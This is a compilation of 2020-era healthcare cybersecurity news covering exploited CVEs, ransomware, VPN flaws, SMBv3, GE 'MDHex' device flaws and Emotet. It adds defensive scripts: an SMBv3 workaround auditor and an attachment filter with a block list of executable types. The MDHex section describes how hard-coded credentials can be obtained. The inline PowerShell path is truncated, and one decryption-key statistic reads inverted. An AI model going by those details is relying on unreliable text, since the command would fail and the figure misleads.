CISA and FBI Reveal Top 10 List of Exploited Vulnerabilities

The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) recently published a joint public service announcement describing the ten most exploited vulnerabilities from 2016 to 2019. Sophisticated nation-state hackers exploit these vulnerabilities to attack organizations in both the public and private sectors, gaining access to their systems to steal sensitive information.

Hacking groups connected to China, Russia, Iran, and North Korea widely exploit the vulnerabilities on the list. Their cyber actors continue to carry out attacks that take advantage of these vulnerabilities even though patches that correct them have long been available. In certain instances, patches have been available for over 5 years, yet a number of companies have still not applied them.

Exploiting the vulnerabilities on the top 10 list requires far fewer resources than developing zero-day exploits, which means attackers can conduct more attacks. If companies apply the patches that resolve these ten vulnerabilities, nation-state hackers will be forced to create new exploits, restricting their ability to carry out attacks.

CISA and the FBI explain in the announcement that a concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries’ operational tradecraft and compel them to develop or acquire exploits that are more expensive and less broadly effective. A concerted patching campaign would additionally strengthen network security by concentrating scarce defensive resources on the observed activities of foreign adversaries.

CISA and the FBI expect the list will help companies prioritize patching, and they urge all companies to invest more time and resources in patching and to establish a program that keeps all systems patched going forward.

Top 10 Consistently Exploited Vulnerabilities

The consistently exploited vulnerabilities on the top ten list are found in Adobe Flash Player, Microsoft SharePoint, Microsoft Windows, Microsoft Office, Microsoft .NET Framework, Apache Struts, and Drupal. Of the ten listed vulnerabilities, most nation-state hacking groups have focused on just three that concern Microsoft’s OLE technology: CVE-2017-11882, CVE-2012-0158 and CVE-2017-0199. Microsoft’s Object Linking and Embedding (OLE) enables content from other applications to be embedded in Word documents. The fourth most frequently exploited vulnerability is CVE-2017-5638, which is found in the Apache Struts web framework. These vulnerabilities were exploited to deliver a variety of malware payloads, including Loki, Pony/FAREIT, FormBook, FINSPY, LATENTBOT, JexBos, Dridex, China Chopper, DOGCALL, FinFisher, WingBird, and Kitty.

  1. Vulnerability CVE-2017-11882 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products
  2. Vulnerability CVE-2017-0199 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
  3. Vulnerability CVE-2017-5638 affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
  4. Vulnerability CVE-2012-0158 affects Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; BizTalk Server 2002 SP1; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; Visual Basic 6.0; and Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2
  5. Vulnerability CVE-2019-0604 affects Microsoft SharePoint
  6. Vulnerability CVE-2017-0143 affects Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT
  7. Vulnerability CVE-2018-4878 affects Adobe Flash Player before 28.0.0.161
  8. Vulnerability CVE-2017-8759 affects Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7
  9. Vulnerability CVE-2015-1641 affects Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
  10. Vulnerability CVE-2018-7600 affects Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1

A warning was also issued regarding two further vulnerabilities, Citrix vulnerability CVE-2019-19781 and Pulse Secure VPN vulnerability CVE-2019-11510, which were exploited in attacks in 2020. Both involve Virtual Private Network (VPN) solutions and are being exploited by nation-state hackers and cybercriminal groups alike.

The rush to adopt cloud collaboration services such as Microsoft Office 365 so that employees can work remotely during COVID-19 has given hackers new avenues for attacking companies. Hasty deployments of these services have led to oversights in security settings that leave them susceptible to attack. Other cybersecurity weaknesses are likewise being exploited, including poor employee training on phishing and social engineering. Inadequate system recovery and backup plans have additionally put companies at risk from ransomware attacks.

Guidance for Healthcare Organizations on Avoiding and Identifying Human-Operated Ransomware Attacks

There has been an increase in human-operated ransomware attacks on healthcare providers and critical infrastructure during the COVID-19 crisis. Many attacks on healthcare providers have occurred in recent weeks, including those on Parkview Medical Center, Brandywine Counselling and Community Services and ExecuPharm.

Many ransomware attacks are automated and begin with a phishing email. Once the ransomware is installed, it usually starts encrypting files within an hour. Human-operated ransomware attacks are different. Access to systems is gained weeks or months before the ransomware is deployed. During that time the attackers harvest credentials, move laterally, and gather and exfiltrate data before the ransomware encrypts files.

The attackers may remain dormant in systems for months before deploying the ransomware at the moment of maximum disruption. The COVID-19 crisis is an ideal time to deploy ransomware on healthcare providers and other institutions engaged in the COVID-19 response, since there is a greater likelihood that the ransom will be paid to ensure a fast recovery.

According to Microsoft’s data, in the first two weeks of April many attacks were carried out by a variety of advanced cybercriminal groups on healthcare organizations, research and pharmaceutical companies, medical billing firms, and suppliers to the healthcare sector, alongside attacks on educational software companies, manufacturers, government organizations, and aid organizations.

Human-operated ransomware attacks were observed using the following 10 ransomware variants: Maze, RobbinHood, PonyFinal, Valet Loader, REvil (Sodinokibi), NetWalker, RagnarLocker, Paradise, LockBit and MedusaLocker. Although the ransomware variants differ, the attacks typically unfold in a similar way: first the attackers gain access to systems; then they steal credentials, move laterally, exfiltrate sensitive information and establish persistence before deploying the ransomware payload.

Microsoft has provided information about how the attackers gain access to systems to help network defenders strengthen their defenses and prevent attacks. Although there are several possible ways of attacking an organization, the threat actors generally use similar methods to gain access.

One of the most commonly used attack methods is via Remote Desktop Protocol or Virtual Desktop endpoints that lack multi-factor authentication, frequently using stolen credentials or brute-force attempts to guess weak passwords. Without multi-factor authentication, attackers can use stolen credentials to access systems. Because valid credentials are used, network defenders may not notice the attackers accessing their networks.

Flaws in internet-facing systems are often exploited. Examples include misconfigured web servers, backup servers, EHRs, and systems management servers. Unpatched vulnerabilities are likewise frequently exploited. Some of the April 2020 attacks involved exploitation of the Pulse Secure VPN flaw, CVE-2019-11510, and the Citrix Application Delivery Controller (ADC) vulnerability, CVE-2019-19781. Flaws in unsupported operating systems are also exploited. To prevent attacks, it is important to keep operating systems up to date and to apply patches promptly after release.

These attacks do not deploy ransomware quickly for a fast payout. All of the threat actors take their time to obtain administrative credentials and move laterally with the aim of penetrating an organization’s entire environment, including inboxes, EHRs, endpoints, and applications. Most of the attacks involved data exfiltration, with the intention of selling the data for profit, using it for other nefarious purposes, or using it to pressure organizations into paying the ransom.

The time between the initial compromise and the deployment of ransomware gives network defenders a chance to detect and stop the attacks. Although threat actors attempt to hide their activity, it is possible to identify them when they move laterally. Network defenders should look for activity that may signal an ongoing attack, including the presence of penetration-testing tools. Security logs should be inspected for signs of tampering. Registry alterations and suspicious access to the Local Security Authority Subsystem Service (LSASS) should also be identified.

Microsoft also provides comprehensive advice on hardening security to stop attacks, along with guidance on investigation, isolation of compromised endpoints, and recovery if an attack is discovered.

Ransomware Attackers Likely to Target Small to Medium-Sized Healthcare Organizations

A new RiskIQ report states that ransomware groups are focusing their campaigns on smaller healthcare companies and clinics. Healthcare organizations with fewer than 500 employees account for 70% of all reported successful healthcare ransomware attacks since 2016.

RiskIQ studied 127 healthcare ransomware attacks and found that attacks increased by 35% from 2016 to 2019. 51% of ransomware attacks were on hospitals and healthcare centers, 24% were on medical practices, and 17% were on health and wellness facilities.

Smaller healthcare providers are likely to have less effective cybersecurity defenses than larger providers. RiskIQ states that 85% of SME hospitals lack a qualified IT security officer, so gaps in security go unaddressed. Paying the ransom is the more likely response, in order to avoid the costly downtime caused by an attack. If the ransom is not paid, recovery often takes several weeks.

A Perfect Storm of New Targets and Methods

According to the RiskIQ intelligence brief “Ransomware in the Health Sector 2020,” the digital transformation of healthcare has created “a perfect storm of new targets and methods.” Recent events have exposed the healthcare sector to many more attacks. The 2019 Novel Coronavirus outbreak has forced healthcare companies to make major changes. Almost overnight, workforces and business operations were decentralized, widening protection gaps and reducing visibility into attack surfaces.

A number of ransomware groups have stated that they will not attack healthcare providers during the COVID-19 public health emergency. However, a few groups have made no such commitment. Attacks are easier to carry out at present, and these groups are taking advantage of the situation. Because cybercriminals are exploiting coronavirus-related disruption, there is a surge in malicious online activity that is likely to affect healthcare facilities and COVID-19 responders.

Ransom Payment is Not a Guarantee of File Recovery

16% of healthcare ransomware attack victims reported paying the ransom to obtain the file decryption keys. The average ransom payment in those attacks was $59,000. Although paying the ransom is an option, the FBI does not recommend it because it only encourages further attacks and file recovery is never 100% certain. A Wall Street Journal article reported that fewer than 50% of decryption keys fail to work, so some data loss is unavoidable even after paying. There have also been cases where the attackers demanded a second payment after the initial one before providing the decryption keys. Paying a ransom additionally signals to ransomware gangs that this target is likely to pay if attacked, so the healthcare provider may be targeted again by the same attacker or by others.

Ransomware gangs use a number of methods to gain access to healthcare networks and install ransomware. One is spam email that tricks a healthcare employee into clicking malicious URLs that download ransomware or into opening email attachments containing ransomware downloaders. Software vulnerabilities, particularly in Remote Desktop Protocol, are often exploited. Because a large number of employees now access healthcare networks remotely through Virtual Private Networks (VPNs), ransomware gangs are also targeting VPN vulnerabilities. Several vulnerabilities were identified in VPN solutions over the past year. Although patches are available to fix these flaws, they are frequently not applied.

Action Steps to Minimize Risk and Stop Ransomware Attacks

Make backups regularly so that files can be recovered when an attack occurs. However, backups alone do not guarantee data restoration. A number of threat groups carry out manual ransomware attacks and spend a long time inside the network before deploying ransomware. In some cases the attackers push their ransomware into backup systems as well so that the backups are encrypted too.

RiskIQ recommends that healthcare providers store backups offline or on separate networks. Encrypting stored data is likewise essential. Data theft prior to ransomware deployment has increased; when data is encrypted, the attackers cannot read it even if it is stolen.

RiskIQ highlights the value of having an incident response plan, because it helps ensure that attacks are mitigated promptly to limit the damage. It is also very important to apply patches quickly.

During the COVID-19 crisis, make sure that all digital assets connecting to external organizations are monitored and secured, because attackers are actively looking for these devices.

It is furthermore crucial to prepare the workforce and train employees to recognize threats such as phishing attacks. Phishing simulation exercises can help reduce susceptibility to ransomware attacks. IT teams must also stay current on the latest attack trends, which change constantly.

Cybercriminals Targeting Remote Employees Throughout the COVID-19 Crisis

The COVID-19 outbreak has made it necessary for many people to self-quarantine, and organizations are under growing pressure to allow their staff to work from home wherever possible. Although these steps are needed to keep people safe and prevent infection, having many employees working remotely heightens cyber risk. When people work from home and connect to work networks remotely using portable devices, the attack surface grows substantially and new vulnerabilities are introduced that attackers can exploit. With attacks on remote workers increasing, it is essential to follow cybersecurity guidelines for securing remote workers to reduce risk.

Phishing Campaigns Aimed towards Remote Employees

Cybercriminals are exploiting the coronavirus crisis, using COVID-19 and coronavirus-themed lures in phishing and social engineering attacks to steal account credentials and spread malware. The first major coronavirus-themed phishing and malware distribution campaigns were detected at the start of January, and the volume of malicious emails has increased considerably in the weeks since. Phishing attacks will most likely keep increasing as cybercriminals attempt to steal remote access credentials and use them in weaponized email attacks that spread malware.

Campaigns aimed specifically at remote employees have also recently been discovered. One such campaign notifies remote staff of positive COVID-19 tests within their company. The messages impersonate the employer and claim to contain information about emergency procedures that have been put in place, which remote employees are told to open, review and print out. Opening the attachments and enabling content triggers a malware download. Security researchers have also observed a rise in the number of domains being used to drive malware attacks.

VPN Vulnerabilities Exploitation

Over the past year, a number of critical vulnerabilities were discovered in the Virtual Private Network (VPN) solutions that remote employees use to connect securely to their company networks. Pulse Connect Secure and Pulse Policy Secure gateways and FortiGuard solutions were found to have vulnerabilities. Although patches were released to fix them, many organizations did not apply the patches because the solutions were in use 24 hours a day. APT groups seized the opportunity and exploited the vulnerabilities to access company networks. Now, with many employees using VPNs and working from home, attacks are rising once more.

A large number of businesses are now using VPN services, teleconferencing tools, and other remote access methods for the first time, and have had to roll the solutions out quickly. Web and email services that were previously accessed only from within the company have been reconfigured to permit external access, leaving those internal services open to the internet. The speed at which these changes were made to give telecommuting workers access suggests that businesses were unable to review them fully and make sure security was buttoned down.

CISA Warns of Exploitation of Vulnerabilities in VPNs and Campaigns Aimed Towards Remote Employees

To curb the spread of the coronavirus, many companies are allowing their employees to work from home. Although this measure is essential for lowering the risk of infection with Coronavirus Disease 2019 (COVID-19), working from home brings other problems.

To defend against cyberattacks, remote network connections should use enterprise-class virtual private network (VPN) solutions. VPNs protect the connection between a user’s device and the network, allowing healthcare data to be accessed and shared securely.

Although VPNs enhance security, many VPN solutions have vulnerabilities that cybercriminals can exploit. If those vulnerabilities are exploited, sensitive information may be intercepted, and an attacker may even take control of affected systems. Cybercriminals are actively looking for VPN vulnerabilities to exploit, and the larger number of remote employees due to the coronavirus gives them even more potential victims.

The risks associated with VPNs and the growing number of remote employees due to the coronavirus have prompted the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging companies to strengthen VPN security and follow cybersecurity controls to defend against cyberattacks.

A number of vulnerabilities were found in common VPN solutions over the past year, including VPN products from Palo Alto Networks, Pulse Secure, and FortiGuard. Although patches were available to address the vulnerabilities, many companies did not update their software to the latest version. Failing to patch negates the security provided by the VPN.

In January 2020, a campaign was detected that exploited CVE-2019-11510, a remote code execution vulnerability in Pulse Connect Secure and Pulse Policy Secure, to deploy REvil ransomware. By exploiting the vulnerability, an attacker can potentially view all active users, obtain their credentials in plaintext, and execute arbitrary commands on VPN clients when they connect to the server. Pulse Secure released a patch for the vulnerability on April 24, 2019, yet 9 months later many businesses were still running vulnerable VPN versions.

Updating VPNs can be difficult because they are generally in use 24 hours a day; nevertheless, it is important that updates are applied because of the high likelihood that unpatched vulnerabilities will be exploited. CISA is urging all businesses to prioritize VPN patches.

It is also essential to ensure that users can access only the systems they need to perform their job duties. Giving remote workers low-level privileges limits the damage that can be done if their credentials are compromised. IT teams should likewise step up monitoring of their systems and review access logs to identify possible compromises.

CISA has additionally warned of the growing number of phishing attacks aimed at remote workers to obtain VPN credentials. Email security solutions are necessary to catch these messages before they are delivered. Multi-factor authentication should be implemented for remote access to prevent the use of compromised credentials. CISA warns that businesses that do not implement MFA will be at higher risk from phishing attacks.

IT teams must likewise ensure their systems can handle the larger number of remote personnel. CISA warns that businesses may find they have only a limited number of VPN connections, and if they are all in use, some users will be unable to access the systems they need to telework.

The HHS’ Centers for Medicare and Medicaid Services (CMS) has expanded Medicare telehealth benefits to help in the fight against COVID-19, and the HHS’ Office for Civil Rights has announced it will exercise enforcement discretion with regard to telehealth. This will enable more healthcare employees to work remotely over the coming weeks, so it is essential that VPN guidelines are followed.

No Patch Yet for the Identified Maximum Severity SMBv3 Vulnerability

A critical vulnerability has been found in Windows Server Message Block version 3 (SMBv3) that an attacker could potentially exploit in a WannaCry-style attack. The vulnerability could be combined with a worm so that one infected machine infects all other vulnerable devices connected to the network.

The vulnerability in the SMBv3 protocol is a pre-authentication remote code execution flaw caused by an error in how SMBv3 handles maliciously crafted compressed data packets. When exploited, an unauthenticated attacker can execute arbitrary code in the context of the application and take full control of a vulnerable system. The attacker can exploit the vulnerability remotely by sending a specially crafted packet to a targeted SMBv3 server.

The vulnerability, tracked as CVE-2020-0796, affects Windows Server Version 1903 (Server Core installation), Windows 10 Version 1903, Windows Server Version 1909 (Server Core installation) and Windows 10 Version 1909. There is no confirmation yet of whether earlier Windows versions such as Windows 8 and Windows Server 2012 are vulnerable.

Fortinet and Cisco Talos published summaries of the SMBv3 vulnerability on their blogs, although Cisco Talos later removed its post. Microsoft was expected to release a patch for the vulnerability on March 2020 Patch Tuesday; however, a complete fix was not yet ready.

No proof-of-concept exploits for the vulnerability have been published online yet and there have been no reports of exploitation in the wild; nonetheless, Microsoft advises Windows administrators to take action to protect against exploitation until a patch is released.

Temporary Solutions:

  • Disable SMBv3 compression
  • Block TCP port 445 at the network perimeter firewall

Blocking port 445 is the recommended defense against internet-based attacks, but it will not stop exploitation from inside the enterprise firewall.

SMBv3 compression can be disabled on SMBv3 servers using the PowerShell command: Set-ItemProperty -Path "HKLM:" DisableCompression -Type DWORD -Value 1 -Force. No reboot is required after making the change.

According to Microsoft, disabling SMBv3 compression will not prevent exploitation of SMB clients.
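As an added example that is not part of the original article or of Microsoft's own guidance, the following PowerShell script audits whether the local host is on one of the affected builds named above and whether the server-side DisableCompression workaround is already in place, applying it only when needed. It assumes the full registry location is the LanmanServer Parameters key that Microsoft's published workaround writes to, and that builds 18362 and 18363 correspond to the 1903 and 1909 releases listed above.

```powershell
# Added example (not from the original article or from Microsoft).
# Audits and applies the server-side SMBv3 compression workaround for CVE-2020-0796.
# Assumption: the workaround value lives under the LanmanServer Parameters key.
$script:SmbParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
# Assumption: OS builds 18362 and 18363 are Windows 10 / Server versions 1903 and 1909.
$script:AffectedBuilds = @(18362, 18363)

function Test-SmbCompressionDisabled {
    # Returns $true only when DisableCompression exists and is set to 1.
    $item = Get-ItemProperty -Path $script:SmbParams -Name DisableCompression `
        -ErrorAction SilentlyContinue
    return ($null -ne $item -and [int]$item.DisableCompression -eq 1)
}

function Get-Smbv3CompressionStatus {
    # Summarises the host's build and workaround state for reporting or fleet audits.
    $build = [int][Environment]::OSVersion.Version.Build
    [pscustomobject]@{
        ComputerName        = $env:COMPUTERNAME
        Build               = $build
        BuildInAffectedList = ($script:AffectedBuilds -contains $build)
        CompressionDisabled = (Test-SmbCompressionDisabled)
    }
}

function Disable-SmbCompression {
    # Writes DisableCompression=1 (no reboot needed). Supports -WhatIf for dry runs.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($script:SmbParams, 'Set DisableCompression = 1')) {
        Set-ItemProperty -Path $script:SmbParams -Name DisableCompression `
            -Type DWORD -Value 1 -Force
    }
    return Test-SmbCompressionDisabled
}

# Run elevated. Only touches the registry when the build is affected and the
# workaround is missing; note this protects the SMB server role only, not clients.
$status = Get-Smbv3CompressionStatus
$status | Format-List
if ($status.BuildInAffectedList -and -not $status.CompressionDisabled) {
    Write-Warning 'Affected build with SMBv3 compression enabled; applying server-side workaround.'
    $applied = Disable-SmbCompression -Confirm:$false
    "Workaround applied: $applied"
}
```

For a fleet, run Get-Smbv3CompressionStatus through Invoke-Command against your server list and treat any affected build reporting CompressionDisabled = False as a finding.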

The patch should be applied as soon as it is released. There is no timeline yet for its release, but given the severity of the vulnerability, an out-of-band patch is likely.

GE Healthcare Patient Monitoring Products Affected by Critical ‘MDHex’ Vulnerabilities

A security researcher at CyberMDX identified critical vulnerabilities in GE Healthcare patient monitoring equipment.

CyberMDX Head of Research, Elad Luz, discovered six vulnerabilities, with five rated as critical and one rated as high severity. The assigned CVSS v3 score of the five critical vulnerabilities was 10 out of 10. The assigned CVSS v3 score for the other vulnerability was 8.5 out of 10.

Attackers exploiting the vulnerabilities could render the affected products unusable. The functionality of vulnerable products could be modified remotely, alarm settings could be disabled, and protected health information (PHI) stored on the device could be stolen.

The first product investigated by CyberMDX was the CARESCAPE Clinical Information Center (CIC) Pro, but the vulnerabilities were found to also affect patient monitors, telemetry systems and servers. The vulnerabilities were collectively named MDHex and were assigned CVE-2020-6961, CVE-2020-6962, CVE-2020-6963, CVE-2020-6964, CVE-2020-6965, and CVE-2020-6966. GE Healthcare confirmed that the vulnerabilities could have serious consequences for patients, with hundreds of thousands of products potentially exploitable.

CVE-2020-6961 (CVSS 10.0) – unprotected storage of credentials (CWE-256). An attacker exploiting the vulnerability could obtain the SSH private key from the configuration files, open an SSH connection, and remotely execute arbitrary code on affected products. All vulnerable products share the same SSH key.

CVE-2020-6962 (CVSS 10.0) – improper input validation (CWE-20) in the configuration utility of the networked system. It allows an attacker to execute arbitrary code remotely.

CVE-2020-6963 (CVSS 10.0) – use of hard-coded Server Message Block (SMB) credentials (CWE-798). It allows an attacker to establish an SMB connection and read and/or write files on the system. The SMB credentials can be obtained using the password recovery tool of the Windows XP Embedded operating system.

CVE-2020-6964 (CVSS 10.0) – missing authentication for critical function (CWE-306) in the integrated Kavoom! keyboard/mouse software. An attacker exploiting this vulnerability can remotely input keystrokes and change device configurations on all affected devices on the network without any authentication.

CVE-2020-6965 (CVSS 8.5) – unrestricted upload of dangerous file types (CWE-434). It allows an attacker to upload arbitrary files via the software update facility.

CVE-2020-6966 (CVSS 10.0) – inadequate encryption strength (CWE-326). Because of the weak encryption, an attacker can obtain remote desktop control via the VNC software and remotely execute code on vulnerable connected devices. The required credentials can also be obtained from publicly available product documentation.

Based on the latest ICS-CERT Advisory, the vulnerabilities affect the following GE Healthcare products:

  • ApexPro Telemetry Server, Versions 4.2 and earlier versions
  • Clinical Information Center (CIC), Versions 4.X and 5.X
  • CARESCAPE Telemetry Server, Versions 4.2 and earlier versions
  • CARESCAPE Central Station (CSCS), Versions 1.X; Versions 2.X
  • CARESCAPE Telemetry Server, Version 4.3
  • B450, Version 2.X
  • B650, Version 1.X; Version 2.X
  • B850, Version 1.X; Version 2.X

GE Healthcare is currently developing patches for the vulnerable devices, which will be available in Q2 of 2020. In the meantime, GE Healthcare has released recommended mitigations to minimize the risk of exploitation.

Healthcare providers should follow basic network security best practices, ensure the mission critical (MC) and information exchange (IX) networks are configured correctly, and meet the requirements set out in the CARESCAPE Network Configuration Guide, Patient Monitoring Network Configuration Guide, and the product technical and service manuals.

Use a router or firewall if connectivity outside the MC and/or IX networks is necessary. GE Healthcare advises blocking all inbound traffic from outside the network at the MC and IX router firewall, except where required for clinical data flows. The following ports must be blocked so that traffic from outside the MC and IX networks does not get through:

  • TCP Port 22 for SSH
  • TCP and UDP Ports 137, 138, 139, and 445 for NetBIOS and SMB
  • TCP Ports 10000, 5225, 5800, 5900, and 10001

Limit physical access to Telemetry Servers, Central Stations, and the MC and IX networks. Follow password management guidelines and change default passwords for Webmin.

No exploits for the vulnerabilities are believed to have been made public. GE Healthcare is not aware of any attempted cyberattacks or patient harm resulting from the vulnerabilities.

CISA Warns About Increasing Emotet Malware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently issued a warning about an increase in Emotet malware attacks.

Emotet was first detected in 2014 and was initially used to steal banking credentials. It has developed considerably over the past five years and is now a highly sophisticated Trojan.

Besides stealing banking information, Emotet can steal passwords stored in web browsers and credential files on external drives. Modules have been added that enable it to propagate via email and download other malware variants. The malware has been used to infect devices with crypto wallet stealers and cryptocurrency miners, the TrickBot banking Trojan, and Ryuk ransomware. These secondary payloads are often downloaded weeks, months, or even years after the initial Emotet infection.

Emotet is mainly delivered via spam email. Initially the malware was distributed as JavaScript attachments, but the threat actors behind it switched to Office documents containing malicious macros that use PowerShell commands to download the malware. When the attachment is opened and content is enabled, Emotet is silently downloaded and executed. Spam emails containing hyperlinks to malicious sites have also been used to install the malware.

Emotet establishes persistence by injecting itself into running processes and creating registry entries so that it runs every time the computer boots. Once a victim’s computer is infected, it is added to the Emotet botnet and used to email copies of Emotet to the victim’s contacts. According to SecureWorks, Emotet harvests the first 8KB of every email in the inbox and uses them to craft new messages to contacts that quote real message threads, so the replies appear alongside the unread messages in the recipient’s inbox. This tactic increases the likelihood that the recipient will open the message and its attachment. Campaigns have also been detected using attachments that mimic receipts, shipping notices, invoices, and remittance notices.

Besides propagating by email, Emotet enumerates network resources and writes itself to network shares, and it brute forces domain credentials. If Emotet is found on one computer, it is likely that many others on the network are also infected. Removal can be difficult, as cleaned devices may be reinfected by other infected computers on the network.

The Emotet botnet went quiet in May 2019 but reactivated in September. Activity abruptly stopped again in late December and stayed quiet until January 13, 2020, when large spamming campaigns resumed. Proofpoint observed one spam campaign targeting pharmaceutical firms in which 750,000 emails were sent in a single day.

An attacker can use an Emotet infection to acquire sensitive information. Such an attack can result in the loss of proprietary information, financial losses, operational disruption, and reputational damage.

CISA recommends the following steps to minimize the risk of an Emotet malware attack:

  • Block email attachments commonly associated with malware (.exe, .dll, .js, etc.)
  • Block archive attachments such as .zip and .rar files, which cannot be scanned by anti-virus software
  • Apply Group Policy Object and firewall policies
  • Install anti-virus software on all endpoints
  • Apply patches promptly and adopt a formalized patch management process
  • Apply filters at the email gateway
  • Use firewalls to block suspicious IP addresses
  • Minimize the use of administrator credentials and follow the principle of least privilege
  • Implement DMARC
  • Segment and isolate networks
  • Restrict unnecessary lateral communications

Complete CISA guidance on preventing and responding to Emotet attacks is available in the CISA alert.
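The first two CISA recommendations above (block executable attachment types, block archives the gateway cannot scan) can be enforced with a small gateway-side attachment policy. The following is an added example, not code from CISA or from the original article; the blocked and archive extension lists are illustrative choices, and the sample message it scans is constructed here, not a real Emotet email. It also holds macro-enabled Office documents for sandboxing, since those are Emotet's main delivery vehicle, by looking for a VBA project inside the OOXML zip container.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from pathlib import PurePosixPath

# Illustrative policy lists (assumptions for this example, not CISA's exhaustive
# lists): extensions the Emotet guidance says to block outright, and archive
# types a gateway antivirus engine cannot reliably inspect.
BLOCKED_EXTENSIONS = {".exe", ".dll", ".js", ".jse", ".vbs", ".scr", ".hta", ".ps1"}
ARCHIVE_EXTENSIONS = {".zip", ".rar", ".7z"}
OOXML_EXTENSIONS = {".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}


def ooxml_has_macros(data: bytes) -> bool:
    """Office 2007+ documents are zip containers; a VBA project is stored as vbaProject.bin."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(name.lower().endswith("vbaproject.bin") for name in archive.namelist())
    except zipfile.BadZipFile:
        return False


def classify_attachment(filename: str, data: bytes) -> str:
    """Return 'block', 'quarantine' or 'allow' for a single attachment."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    ext = suffixes[-1] if suffixes else ""
    if ext in BLOCKED_EXTENSIONS or ext in ARCHIVE_EXTENSIONS:
        return "block"
    # Double extensions such as "remittance.pdf.exe" are a common lure.
    if any(s in BLOCKED_EXTENSIONS for s in suffixes[:-1]):
        return "block"
    # Macro-enabled Office documents: hold for sandbox detonation rather than deliver.
    if ext in OOXML_EXTENSIONS and ooxml_has_macros(data):
        return "quarantine"
    return "allow"


def scan_message(raw: bytes) -> dict:
    """Map each attachment filename in a raw RFC 822 message to its verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    verdicts = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "unnamed"
        verdicts[name] = classify_attachment(name, part.get_payload(decode=True) or b"")
    return verdicts


# --- constructed sample input (not a real Emotet message) --------------------
def build_macro_doc() -> bytes:
    """A minimal OOXML container that carries a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<w:document/>")
        archive.writestr("word/vbaProject.bin", b"\x00" * 32)
    return buf.getvalue()


def build_sample_email() -> bytes:
    msg = EmailMessage()
    msg["From"] = "accounts@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Re: Invoice 4471"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(build_macro_doc(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="Invoice_4471.docm")
    msg.add_attachment(b"PK\x05\x06" + b"\x00" * 18, maintype="application",
                       subtype="zip", filename="scan.zip")
    msg.add_attachment(b"MZ" + b"\x00" * 64, maintype="application",
                       subtype="octet-stream", filename="remittance.pdf.exe")
    msg.add_attachment(b"%PDF-1.4\n", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, verdict in scan_message(build_sample_email()).items():
        print(f"{verdict:10s} {name}")
```

The extension check alone would let the macro document through, which is why the content check on the zip container matters: the filename is attacker-controlled, the presence of `vbaProject.bin` is not.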

Phishing Attack on Adventist Health Sonora and Recovery of Great Plains Health from Ransomware Attack

Adventist Health Sonora in California discovered that an unauthorized individual had accessed a hospital associate's email account, potentially exposing patient information.

The Adventist Health Sonora information security team detected the breach on September 30, 2019, and acted quickly to secure the compromised Office 365 account. An investigation was launched to determine the extent of the breach.

The investigation confirmed that the Office 365 account was accessed without authorization after an employee responded to a phishing email. The incident was isolated; no other email accounts or systems were affected.

The apparent motive was to redirect invoice payments and defraud the hospital and its vendors, rather than to obtain sensitive patient information.

According to Adventist Health Sonora, a thorough review of the breached account, completed on October 14, 2019, showed that it contained the protected health information (PHI) of 2,653 patients. The information exposed included names, medical record numbers, dates of birth, health insurance information, hospital account numbers, and medical details related to treatment provided at the hospital.

No evidence was found to suggest the attacker obtained patient information, but as a precaution Adventist Health Sonora sent notification letters to the affected patients and offered complimentary identity theft protection services for one year.

80% Recovery After Great Plains Health November 2019 Ransomware Attack

Great Plains Health in North Platte, NE suffered a ransomware attack in November 2019 that encrypted its network. The provider chose not to pay the ransom and restored its systems from backups. It has been a long and painstaking process, but hospital representatives have announced that recovery is now 80% complete.

Patient systems were given the highest priority and were restored first; critical patient systems were back within two weeks. Staff worked around the clock to restore systems as quickly as possible. During the attack and throughout the recovery, patients continued to receive care and none were turned away or redirected to other facilities.

Hospital representatives now report that all key IT systems are back online and that patient care services were not affected by the attack. Only the archives, which contain information the hospital rarely uses, remain to be restored.

DHS Issues Notice of Critical Citrix Vulnerability Being Actively Exploited

The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert about a recently identified vulnerability in Citrix Application Delivery Controller and Citrix Gateway appliances.

The vulnerability, tracked as CVE-2019-19781, can be exploited over the internet to execute arbitrary code on vulnerable appliances. An attacker who exploits it gains access to the appliance and can use it to attack other resources on the internal network. Several security researchers consider the bug one of the most dangerous vulnerabilities disclosed in recent memory.

